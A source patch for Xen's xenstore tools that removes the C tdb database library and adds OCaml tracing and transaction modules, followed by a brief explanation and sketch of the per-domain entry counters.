-               /* read only databases don't do locking or clear if first */
-               tdb->flags |= TDB_NOLOCK;
-               tdb->flags &= ~TDB_CLEAR_IF_FIRST;
-       }
-
-       /* internal databases don't mmap or lock, and start off cleared */
-       if (tdb->flags & TDB_INTERNAL) {
-               tdb->flags |= (TDB_NOLOCK | TDB_NOMMAP);
-               tdb->flags &= ~TDB_CLEAR_IF_FIRST;
-               if (tdb_new_database(tdb, hash_size) != 0) {
-                       TDB_LOG((tdb, 0, "tdb_open_ex: tdb_new_database failed!"));
-                       goto fail;
-               }
-               goto internal;
-       }
-
-       if ((tdb->fd = open(name, open_flags, mode)) == -1) {
-               TDB_LOG((tdb, 5, "tdb_open_ex: could not open file %s: %s\n",
-                        name, strerror(errno)));
-               goto fail;      /* errno set by open(2) */
-       }
-
-       /* ensure there is only one process initialising at once */
-       if (tdb_brlock(tdb, GLOBAL_LOCK, F_WRLCK, F_SETLKW, 0) == -1) {
-               TDB_LOG((tdb, 0, "tdb_open_ex: failed to get global lock on %s: %s\n",
-                        name, strerror(errno)));
-               goto fail;      /* errno set by tdb_brlock */
-       }
-
-       /* we need to zero database if we are the only one with it open */
-       if ((tdb_flags & TDB_CLEAR_IF_FIRST) &&
-               (locked = (tdb_brlock(tdb, ACTIVE_LOCK, F_WRLCK, F_SETLK, 0) == 0))) {
-               open_flags |= O_CREAT;
-               if (ftruncate(tdb->fd, 0) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_open_ex: "
-                                "failed to truncate %s: %s\n",
-                                name, strerror(errno)));
-                       goto fail; /* errno set by ftruncate */
-               }
-       }
-
-       if (read(tdb->fd, &tdb->header, sizeof(tdb->header)) != sizeof(tdb->header)
-           || strcmp(tdb->header.magic_food, TDB_MAGIC_FOOD) != 0
-           || (tdb->header.version != TDB_VERSION
-               && !(rev = (tdb->header.version==TDB_BYTEREV(TDB_VERSION))))) {
-               /* its not a valid database - possibly initialise it */
-               if (!(open_flags & O_CREAT) || tdb_new_database(tdb, hash_size) == -1) {
-                       errno = EIO; /* ie bad format or something */
-                       goto fail;
-               }
-               rev = (tdb->flags & TDB_CONVERT);
-       }
-       vp = (uint8_t *)&tdb->header.version;
-       vertest = (((uint32_t)vp[0]) << 24) | (((uint32_t)vp[1]) << 16) |
-                 (((uint32_t)vp[2]) << 8) | (uint32_t)vp[3];
-       tdb->flags |= (vertest==TDB_VERSION) ? TDB_BIGENDIAN : 0;
-       if (!rev)
-               tdb->flags &= ~TDB_CONVERT;
-       else {
-               tdb->flags |= TDB_CONVERT;
-               convert(&tdb->header, sizeof(tdb->header));
-       }
-       if (fstat(tdb->fd, &st) == -1)
-               goto fail;
-
-       /* Is it already in the open list?  If so, fail. */
-       if (tdb_already_open(st.st_dev, st.st_ino)) {
-               TDB_LOG((tdb, 2, "tdb_open_ex: "
-                        "%s (%d,%d) is already open in this process\n",
-                        name, (int)st.st_dev, (int)st.st_ino));
-               errno = EBUSY;
-               goto fail;
-       }
-
-       if (!(tdb->name = (char *)talloc_strdup(tdb, name))) {
-               errno = ENOMEM;
-               goto fail;
-       }
-
-       tdb->map_size = st.st_size;
-       tdb->device = st.st_dev;
-       tdb->inode = st.st_ino;
-       tdb->locked = talloc_zero_array(tdb, struct tdb_lock_type,
-                                       tdb->header.hash_size+1);
-       if (!tdb->locked) {
-               TDB_LOG((tdb, 2, "tdb_open_ex: "
-                        "failed to allocate lock structure for %s\n",
-                        name));
-               errno = ENOMEM;
-               goto fail;
-       }
-       tdb_mmap(tdb);
-       if (locked) {
-               if (tdb_brlock(tdb, ACTIVE_LOCK, F_UNLCK, F_SETLK, 0) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_open_ex: "
-                                "failed to take ACTIVE_LOCK on %s: %s\n",
-                                name, strerror(errno)));
-                       goto fail;
-               }
-
-       }
-
-       /* We always need to do this if the CLEAR_IF_FIRST flag is set, even if
-          we didn't get the initial exclusive lock as we need to let all other
-          users know we're using it. */
-
-       if (tdb_flags & TDB_CLEAR_IF_FIRST) {
-       /* leave this lock in place to indicate it's in use */
-       if (tdb_brlock(tdb, ACTIVE_LOCK, F_RDLCK, F_SETLKW, 0) == -1)
-               goto fail;
-       }
-
-
- internal:
-       /* Internal (memory-only) databases skip all the code above to
-        * do with disk files, and resume here by releasing their
-        * global lock and hooking into the active list. */
-       if (tdb_brlock(tdb, GLOBAL_LOCK, F_UNLCK, F_SETLKW, 0) == -1)
-               goto fail;
-       tdb->next = tdbs;
-       tdbs = tdb;
-       return tdb;
-
- fail:
-       { int save_errno = errno;
-
-       if (!tdb)
-               return NULL;
-       
-       if (tdb->map_ptr) {
-               if (tdb->flags & TDB_INTERNAL)
-                       SAFE_FREE(tdb->map_ptr);
-               else
-                       tdb_munmap(tdb);
-       }
-       SAFE_FREE(tdb->name);
-       if (tdb->fd != -1)
-               if (close(tdb->fd) != 0)
-                       TDB_LOG((tdb, 5, "tdb_open_ex: failed to close tdb->fd on error!\n"));
-       SAFE_FREE(tdb->locked);
-       SAFE_FREE(tdb);
-       errno = save_errno;
-       return NULL;
-       }
-}
-
-/**
- * Close a database.
- *
- * @returns -1 for error; 0 for success.
- **/
-int tdb_close(TDB_CONTEXT *tdb)
-{
-       TDB_CONTEXT **i;
-       int ret = 0;
-
-       if (tdb->map_ptr) {
-               if (tdb->flags & TDB_INTERNAL)
-                       SAFE_FREE(tdb->map_ptr);
-               else
-                       tdb_munmap(tdb);
-       }
-       SAFE_FREE(tdb->name);
-       if (tdb->fd != -1)
-               ret = close(tdb->fd);
-       SAFE_FREE(tdb->locked);
-
-       /* Remove from contexts list */
-       for (i = &tdbs; *i; i = &(*i)->next) {
-               if (*i == tdb) {
-                       *i = tdb->next;
-                       break;
-               }
-       }
-
-       memset(tdb, 0, sizeof(*tdb));
-       SAFE_FREE(tdb);
-
-       return ret;
-}
-
-/* lock/unlock entire database */
-int tdb_lockall(TDB_CONTEXT *tdb)
-{
-       uint32_t i;
-
-       /* There are no locks on read-only dbs */
-       if (tdb->read_only)
-               return TDB_ERRCODE(TDB_ERR_LOCK, -1);
-       for (i = 0; i < tdb->header.hash_size; i++) 
-               if (tdb_lock(tdb, i, F_WRLCK))
-                       break;
-
-       /* If error, release locks we have... */
-       if (i < tdb->header.hash_size) {
-               uint32_t j;
-
-               for ( j = 0; j < i; j++)
-                       tdb_unlock(tdb, j, F_WRLCK);
-               return TDB_ERRCODE(TDB_ERR_NOLOCK, -1);
-       }
-
-       return 0;
-}
-void tdb_unlockall(TDB_CONTEXT *tdb)
-{
-       uint32_t i;
-       for (i=0; i < tdb->header.hash_size; i++)
-               tdb_unlock(tdb, i, F_WRLCK);
-}
-
-/* lock/unlock one hash chain. This is meant to be used to reduce
-   contention - it cannot guarantee how many records will be locked */
-int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK);
-}
-
-int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK);
-}
-
-int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK);
-}
-
-int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK);
-}
-
-
-/* register a loging function */
-void tdb_logging_function(TDB_CONTEXT *tdb, void (*fn)(TDB_CONTEXT *, int , const char *, ...))
-{
-       tdb->log_fn = fn?fn:null_log_fn;
-}
-
-
-/* reopen a tdb - this can be used after a fork to ensure that we have an independent
-   seek pointer from our parent and to re-establish locks */
-int tdb_reopen(TDB_CONTEXT *tdb)
-{
-       struct stat st;
-
-       if (tdb->flags & TDB_INTERNAL)
-               return 0; /* Nothing to do. */
-       if (tdb_munmap(tdb) != 0) {
-               TDB_LOG((tdb, 0, "tdb_reopen: munmap failed (%s)\n", strerror(errno)));
-               goto fail;
-       }
-       if (close(tdb->fd) != 0)
-               TDB_LOG((tdb, 0, "tdb_reopen: WARNING closing tdb->fd failed!\n"));
-       tdb->fd = open(tdb->name, tdb->open_flags & ~(O_CREAT|O_TRUNC), 0);
-       if (tdb->fd == -1) {
-               TDB_LOG((tdb, 0, "tdb_reopen: open failed (%s)\n", strerror(errno)));
-               goto fail;
-       }
-       if (fstat(tdb->fd, &st) != 0) {
-               TDB_LOG((tdb, 0, "tdb_reopen: fstat failed (%s)\n", strerror(errno)));
-               goto fail;
-       }
-       if (st.st_ino != tdb->inode || st.st_dev != tdb->device) {
-               TDB_LOG((tdb, 0, "tdb_reopen: file dev/inode has changed!\n"));
-               goto fail;
-       }
-       tdb_mmap(tdb);
-       if ((tdb->flags & TDB_CLEAR_IF_FIRST) && (tdb_brlock(tdb, ACTIVE_LOCK, F_RDLCK, F_SETLKW, 0) == -1)) {
-               TDB_LOG((tdb, 0, "tdb_reopen: failed to obtain active lock\n"));
-               goto fail;
-       }
-
-       return 0;
-
-fail:
-       tdb_close(tdb);
-       return -1;
-}
-
-/* Not general: only works if single writer. */
-TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile)
-{
-       int fd, saved_errno;
-       TDB_CONTEXT *copy;
-
-       fd = open(outfile, O_TRUNC|O_CREAT|O_WRONLY, 0640);
-       if (fd < 0)
-               return NULL;
-       if (tdb->map_ptr) {
-               if (write(fd,tdb->map_ptr,tdb->map_size) != (int)tdb->map_size)
-                       goto fail;
-       } else {
-               char buf[65536];
-               int r;
-
-               lseek(tdb->fd, 0, SEEK_SET);
-               while ((r = read(tdb->fd, buf, sizeof(buf))) > 0) {
-                       if (write(fd, buf, r) != r)
-                               goto fail;
-               }
-               if (r < 0)
-                       goto fail;
-       }
-       copy = tdb_open(outfile, 0, 0, O_RDWR, 0);
-       if (!copy)
-               goto fail;
-       close(fd);
-       return copy;
-
-fail:
-       saved_errno = errno;
-       close(fd);
-       unlink(outfile);
-       errno = saved_errno;
-       return NULL;
-}
-
-/* reopen all tdb's */
-int tdb_reopen_all(void)
-{
-       TDB_CONTEXT *tdb;
-
-       for (tdb=tdbs; tdb; tdb = tdb->next) {
-               /* Ensure no clear-if-first. */
-               tdb->flags &= ~TDB_CLEAR_IF_FIRST;
-               if (tdb_reopen(tdb) != 0)
-                       return -1;
-       }
-
-       return 0;
-}
diff -r 10a8fae412c5 tools/xenstore/tdb.h
--- a/tools/xenstore/tdb.h      Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,157 +0,0 @@
-#ifndef __TDB_H__
-#define __TDB_H__
-
-/* 
-   Unix SMB/CIFS implementation.
-
-   trivial database library
-
-   Copyright (C) Andrew Tridgell 1999-2004
-   
-     ** NOTE! The following LGPL license applies to the tdb
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-   
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-
-/* flags to tdb_store() */
-#define TDB_REPLACE 1
-#define TDB_INSERT 2
-#define TDB_MODIFY 3
-
-/* flags for tdb_open() */
-#define TDB_DEFAULT 0 /* just a readability place holder */
-#define TDB_CLEAR_IF_FIRST 1
-#define TDB_INTERNAL 2 /* don't store on disk */
-#define TDB_NOLOCK   4 /* don't do any locking */
-#define TDB_NOMMAP   8 /* don't use mmap */
-#define TDB_CONVERT 16 /* convert endian (internal use) */
-#define TDB_BIGENDIAN 32 /* header is big-endian (internal use) */
-
-#define TDB_ERRCODE(code, ret) ((tdb->ecode = (code)), ret)
-
-/* error codes */
-enum TDB_ERROR {TDB_SUCCESS=0, TDB_ERR_CORRUPT, TDB_ERR_IO, TDB_ERR_LOCK, 
-               TDB_ERR_OOM, TDB_ERR_EXISTS, TDB_ERR_NOLOCK, TDB_ERR_LOCK_TIMEOUT,
-               TDB_ERR_NOEXIST};
-
-#ifndef uint32_t
-#define uint32_t unsigned
-#endif
-
-typedef struct TDB_DATA {
-       char *dptr;
-       size_t dsize;
-} TDB_DATA;
-
-typedef uint32_t tdb_len;
-typedef uint32_t tdb_off;
-
-/* this is stored at the front of every database */
-struct tdb_header {
-       char magic_food[32]; /* for /etc/magic */
-       uint32_t version; /* version of the code */
-       uint32_t hash_size; /* number of hash entries */
-       tdb_off rwlocks;
-       tdb_off reserved[31];
-};
-
-struct tdb_lock_type {
-       uint32_t count;
-       uint32_t ltype;
-};
-
-struct tdb_traverse_lock {
-       struct tdb_traverse_lock *next;
-       uint32_t off;
-       uint32_t hash;
-};
-
-#ifndef PRINTF_ATTRIBUTE
-#define PRINTF_ATTRIBUTE(a,b)
-#endif
-
-/* this is the context structure that is returned from a db open */
-typedef struct tdb_context {
-       char *name; /* the name of the database */
-       void *map_ptr; /* where it is currently mapped */
-       int fd; /* open file descriptor for the database */
-       tdb_len map_size; /* how much space has been mapped */
-       int read_only; /* opened read-only */
-       struct tdb_lock_type *locked; /* array of chain locks */
-       enum TDB_ERROR ecode; /* error code for last tdb error */
-       struct tdb_header header; /* a cached copy of the header */
-       uint32_t flags; /* the flags passed to tdb_open */
-       struct tdb_traverse_lock travlocks; /* current traversal locks */
-       struct tdb_context *next; /* all tdbs to avoid multiple opens */
-       dev_t device;   /* uniquely identifies this tdb */
-       ino_t inode;    /* uniquely identifies this tdb */
-       void (*log_fn)(struct tdb_context *tdb, int level, const char *, ...) PRINTF_ATTRIBUTE(3,4); /* logging function */
-       uint32_t (*hash_fn)(TDB_DATA *key);
-       int open_flags; /* flags used in the open - needed by reopen */
-} TDB_CONTEXT;
-
-typedef int (*tdb_traverse_func)(TDB_CONTEXT *, TDB_DATA, TDB_DATA, void *);
-typedef void (*tdb_log_func)(TDB_CONTEXT *, int , const char *, ...);
-typedef uint32_t (*tdb_hash_func)(TDB_DATA *key);
-
-TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags,
-                     int open_flags, mode_t mode);
-TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags,
-                        int open_flags, mode_t mode,
-                        tdb_log_func log_fn,
-                        tdb_hash_func hash_fn);
-
-int tdb_reopen(TDB_CONTEXT *tdb);
-int tdb_reopen_all(void);
-void tdb_logging_function(TDB_CONTEXT *tdb, tdb_log_func);
-enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb);
-const char *tdb_errorstr(TDB_CONTEXT *tdb);
-TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag);
-int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf);
-int tdb_close(TDB_CONTEXT *tdb);
-TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb);
-TDB_DATA tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *);
-int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_lockall(TDB_CONTEXT *tdb);
-void tdb_unlockall(TDB_CONTEXT *tdb);
-
-/* Low level locking functions: use with care */
-int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key);
-int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key);
-TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile);
-
-/* Debug functions. Not used in production. */
-void tdb_dump_all(TDB_CONTEXT *tdb);
-int tdb_printfreelist(TDB_CONTEXT *tdb);
-
-extern TDB_DATA tdb_null;
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* tdb.h */
diff -r 10a8fae412c5 tools/xenstore/trace.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/trace.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,41 @@
+(* 
+    Tracing for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Trace file descriptor *)
+let traceout = ref None
+
+(* Output a trace string *)
+let out str =
+  match !traceout with
+    | Some channel -> Printf.fprintf channel "%s" str; flush channel
+    | None -> ()
+
+(* Trace a creation *)
+let create data t =
+  out (Printf.sprintf "CREATE %s %d\n" t data)
+
+(* Trace a destruction *)
+let destroy data t =
+  out (Printf.sprintf "DESTROY %s %d\n" t data)
+
+(* Trace I/O *)
+let io domain_id prefix time message =
+  let message_type = Message.message_type_to_string message.Message.header.Message.message_type
+  and sanitised_data = Utils.sanitise_string message.Message.payload in
+  out (Printf.sprintf "%s %d %s %s (%s)\n" prefix domain_id time message_type sanitised_data)
diff -r 10a8fae412c5 tools/xenstore/transaction.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/transaction.ml     Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,287 @@
+(* 
+    Transactions for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type tr =
+  {
+    domain_id : int;
+    transaction_id : int32
+  }
+
+type operation =
+  | NONE
+  | READ
+  | WRITE
+  | RM
+
+type element =
+  {
+    transaction : tr;
+    operation : operation;
+    path : string;
+    mutable modified : bool
+  }
+
+type changed_domain =
+  {
+    id : int;
+    entries : int
+  }
+
+let equal t1 t2 =
+  t1.domain_id = t2.domain_id && t1.transaction_id = t2.transaction_id
+
+let fire_watch watches changed_node =
+  match changed_node.operation with
+  | RM -> watches#fire_watches changed_node.path false true
+  | WRITE -> watches#fire_watches changed_node.path false false
+  | _ -> ()
+
+let fire_watches watches changed_nodes =
+  List.iter (fire_watch watches) changed_nodes
+
+let make domain_id transaction_id =
+  {
+    domain_id = domain_id;
+    transaction_id = transaction_id
+  }
+
+let make_element transaction operation path =
+  {
+    transaction = transaction;
+    operation = operation;
+    path = path;
+    modified = false
+  }
+
+module Transaction_hashtbl =
+  Hashtbl.Make
+  (struct
+    type t = tr
+    let equal = equal
+    let hash = Hashtbl.hash
+  end)
+
+class transaction_reads =
+object (self)
+  val m_paths = Hashtbl.create 32
+  val m_transactions = Transaction_hashtbl.create 8
+  method private paths = m_paths
+  method private transactions = m_transactions
+  method add transaction path =
+    let operation = make_element transaction READ path
+    and paths = self#paths
+    and transactions = self#transactions in
+    let path_operations =
+      if Hashtbl.mem paths path
+      then
+        let current_operations = Hashtbl.find paths path in
+        if not (List.exists (fun op -> transaction = op.transaction) current_operations)
+        then operation :: current_operations
+        else current_operations
+      else [ operation ]
+    and transaction_operations =
+      if Transaction_hashtbl.mem transactions transaction
+      then
+        let current_operations = Transaction_hashtbl.find transactions transaction in
+        if not (List.exists (fun op -> path = op.path) current_operations)
+        then operation :: current_operations
+        else current_operations
+      else [ operation ] in
+    Hashtbl.replace paths path path_operations;
+    Transaction_hashtbl.replace transactions transaction transaction_operations
+  method path_operations path = Hashtbl.find self#paths path
+  method remove_path_operation operation =
+    let remaining = List.filter (fun op -> not (equal op.transaction operation.transaction)) (self#path_operations operation.path) in
+    if List.length remaining > 0
+    then Hashtbl.replace self#paths operation.path remaining
+    else Hashtbl.remove self#paths operation.path
+  method remove_transaction_operations transaction =
+    (try List.iter self#remove_path_operation (self#transaction_operations transaction) with Not_found -> ());
+    Transaction_hashtbl.remove self#transactions transaction
+  method transaction_operations transaction = Transaction_hashtbl.find self#transactions transaction
+end
+
+class ['contents] transaction_store (transaction : tr) (store : 'contents Store.store) (reads : transaction_reads) =
+object (self)
+  inherit ['contents]Store.store as super
+  val m_reads = reads
+  val m_store = store
+  val m_transaction = transaction
+  val m_updates = Hashtbl.create 8
+  method private domain_id = self#transaction.domain_id
+  method private merge_node node =
+    if self#op_exists node#path WRITE || self#op_exists node#path RM || self#op_exists node#path NONE
+    then self#store#replace_node node
+    else
+      match node#contents with
+      | Store.Children children | Store.Hack (_, children) -> List.iter (fun child -> self#merge_node child) children
+      | _ -> ()
+  method private op_add path op =
+    match op with
+    | WRITE -> if not (self#op_exists path RM) then Hashtbl.replace self#updates path (make_element self#transaction op path)
+    | RM -> Hashtbl.replace self#updates path (make_element self#transaction op path)
+    | READ -> if not (self#op_exists path READ) then self#reads#add self#transaction path
+    | NONE -> Hashtbl.replace self#updates path (make_element self#transaction op path)
+  method private op_exists path op =
+    match op with
+    | WRITE | RM | NONE -> (try (Hashtbl.find self#updates path).operation = op with Not_found -> false)
+    | READ -> (try List.exists (fun op -> op.transaction = self#transaction) (self#reads#path_operations path) with Not_found -> false)
+  method private reads = m_reads
+  method private store = m_store
+  method private transaction = m_transaction
+  method private updates = m_updates
+  method changed_nodes = Hashtbl.fold (fun path element nodes -> element :: nodes) self#updates []
+  method create_node path =
+    if not (self#op_exists path WRITE) then self#op_add path WRITE;
+    super#create_node path
+  method merge = self#merge_node self#root
+  method node_exists path =
+    if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE then super#node_exists path else self#store#node_exists path
+  method read_node path =
+    if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE
+    then super#read_node path
+    else (
+      self#op_add path READ;
+      self#store#read_node path
+    )
+  method remove_node path =
+    let parent_path = Store.parent_path path in
+    if self#op_exists parent_path WRITE || self#op_exists parent_path RM || self#op_exists parent_path NONE
+    then (
+      super#remove_node path;
+      self#op_add path RM
+    )
+    else (
+      if not (super#node_exists parent_path)
+      then (
+        super#create_node parent_path;
+        let contents =
+          (match (self#store#read_node parent_path) with
+            | Store.Children _ -> Store.Children []
+            | Store.Hack (value, _) -> Store.Hack (value, [])
+            | contents -> contents) in
+        (super#get_node parent_path)#set_contents contents
+      );
+      let self_parent_node = self#get_node parent_path in
+      match self_parent_node#contents with
+      | Store.Children self_parent_children | Store.Hack (_, self_parent_children) -> (
+            (match self#store#read_node parent_path with
+              | Store.Children store_parent_children | Store.Hack (_, store_parent_children) -> List.iter (fun store_parent_child -> if not (List.exists (fun self_parent_child -> Store.compare self_parent_child store_parent_child = 0) self_parent_children) then ignore (self_parent_node#add_child store_parent_child)) store_parent_children
+              | Store.Empty -> ()
+              | Store.Value _ -> raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#remove_node", path)));
+            self_parent_node#remove_child path;
+            self#op_add path RM;
+            self#op_add parent_path NONE
+          )
+      | _ -> raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#remove_node", path))
+    )
+  method write_node path (contents : 'contents) =
+    if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE
+    then (
+      if not (super#node_exists path) then super#create_node path;
+      self#op_add path WRITE;
+      super#write_node path contents
+    )
+    else if self#store#node_exists path
+    then (
+      self#create_node path;
+      super#write_node path contents
+    )
+    else raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#write_node", path))
+end
+
+class ['contents] transactions (store : 'contents Store.store) =
+object (self)
+  val m_base_store = store
+  val m_num_transactions = Hashtbl.create 8
+  val m_reads = new transaction_reads
+  val m_transaction_changed_domains = Transaction_hashtbl.create 8
+  val m_transaction_ids = Hashtbl.create 8
+  val m_transactions = Transaction_hashtbl.create 8
+  method private add transaction store =
+    if not (Transaction_hashtbl.mem self#transactions transaction)
+    then (
+      Transaction_hashtbl.add self#transactions transaction (new transaction_store transaction store self#reads);
+      Transaction_hashtbl.add self#transaction_changed_domains transaction [ { id = transaction.domain_id; entries = 0 } ];
+      Hashtbl.replace self#num_transactions transaction.domain_id (try succ (self#num_transactions_for_domain transaction.domain_id) with Not_found -> 1);
+    )
+  method private num_transactions = m_num_transactions
+  method private reads = m_reads
+  method private remove transaction =
+    self#reads#remove_transaction_operations transaction;
+    Transaction_hashtbl.remove self#transactions transaction;
+    Transaction_hashtbl.remove self#transaction_changed_domains transaction;
+    Hashtbl.replace self#num_transactions transaction.domain_id (pred (self#num_transactions_for_domain transaction.domain_id))
+  method private transaction_changed_domains = m_transaction_changed_domains
+  method private transaction_ids = m_transaction_ids
+  method private transaction_store transaction = Transaction_hashtbl.find self#transactions transaction
+  method private transactions = m_transactions
+  method private validate transaction =
+    try not (List.fold_left (fun modified op -> if equal op.transaction transaction then op.modified || modified else modified) false (self#reads#transaction_operations transaction))
+    with _ -> true
+  method base_store = m_base_store
+  method commit transaction =
+    if self#validate transaction
+    then (
+      let tstore = self#transaction_store transaction in
+      let changed_nodes = tstore#changed_nodes in
+      self#invalidate_nodes changed_nodes;
+      tstore#merge;
+      self#remove transaction;
+      changed_nodes
+    )
+    else (
+      self#remove transaction;
+      raise Not_found
+    )
+  method domain_entries transaction = Transaction_hashtbl.find self#transaction_changed_domains transaction
+  method domain_entry_decr (transaction : tr) domain_id =
+    try
+      let domain_entry = List.find (fun entry -> entry.id = domain_id) (self#domain_entries transaction) in
+      let new_domain_entry = { id = domain_id; entries = pred domain_entry.entries } in
+      Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) (self#domain_entries transaction)))
+    with Not_found ->
+        let new_domain_entry = { id = domain_id; entries = (- 1) } in
+        Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (self#domain_entries transaction))
+  method domain_entry_incr (transaction : tr) domain_id =
+    try
+      let domain_entry = List.find (fun entry -> entry.id = domain_id) (self#domain_entries transaction) in
+      let new_domain_entry = { id = domain_id; entries = succ domain_entry.entries } in
+      Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) (self#domain_entries transaction)))
+    with Not_found ->
+        let new_domain_entry = { id = domain_id; entries = 1 } in
+        Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (self#domain_entries transaction))
+  method exists transaction = Transaction_hashtbl.mem self#transactions transaction
+  method invalidate path = try List.iter (fun op -> op.modified <- true) (self#reads#path_operations path) with Not_found -> ()
+  method invalidate_nodes nodes = List.iter (fun node -> self#invalidate node.path) nodes
+  method new_transaction (domain : Domain.domain) store =
+    if not (Hashtbl.mem self#transaction_ids domain#id) then Hashtbl.add self#transaction_ids domain#id 1l;
+    let transaction_id = Hashtbl.find self#transaction_ids domain#id in
+    let transaction = make domain#id transaction_id in
+    Hashtbl.replace self#transaction_ids domain#id (Int32.succ transaction_id);
+    if not (Transaction_hashtbl.mem self#transactions transaction) && transaction.transaction_id <> 0l
+    then (self#add transaction store; transaction)
+    else self#new_transaction domain store
+  method num_transactions_for_domain domain_id = try Hashtbl.find self#num_transactions domain_id with Not_found -> 0
+  method remove_domain (domain : Domain.domain) =
+    Transaction_hashtbl.iter (fun transaction store -> if transaction.domain_id = domain#id then self#remove transaction) self#transactions;
+    Hashtbl.remove self#num_transactions domain#id;
+    Hashtbl.remove self#transaction_ids domain#id
+  method store transaction = try ((self#transaction_store transaction) :> 'contents Store.store) with Not_found -> self#base_store
+end
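
The domain_entry_incr and domain_entry_decr methods above differ only in the sign of the adjustment. As a rough illustration of that bookkeeping, here is a minimal sketch written as one pure function. It assumes a record shaped like the { id; entries } values the patch builds; the names domain_entry and adjust are hypothetical and do not appear in the patch.

```ocaml
(* Hypothetical stand-in for the per-domain counter record used above. *)
type domain_entry = { id : int; entries : int }

(* Apply [delta] to the counter for [domain_id]. A domain that is not yet
   in the list starts from 0, which gives 1 or -1 as in the patch. *)
let adjust delta domain_id entries_list =
  let current =
    try (List.find (fun e -> e.id = domain_id) entries_list).entries
    with Not_found -> 0
  in
  { id = domain_id; entries = current + delta }
  :: List.filter (fun e -> e.id <> domain_id) entries_list

let () =
  (* An unknown domain gets a fresh counter. *)
  assert (adjust 1 3 [] = [ { id = 3; entries = 1 } ]);
  (* A known domain is replaced at the head; other entries are kept. *)
  assert (adjust (-1) 3 [ { id = 3; entries = 1 }; { id = 0; entries = 2 } ]
          = [ { id = 3; entries = 0 }; { id = 0; entries = 2 } ])
```

With a helper like this, each method would reduce to a single Transaction_hashtbl.replace call with a delta of 1 or -1.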
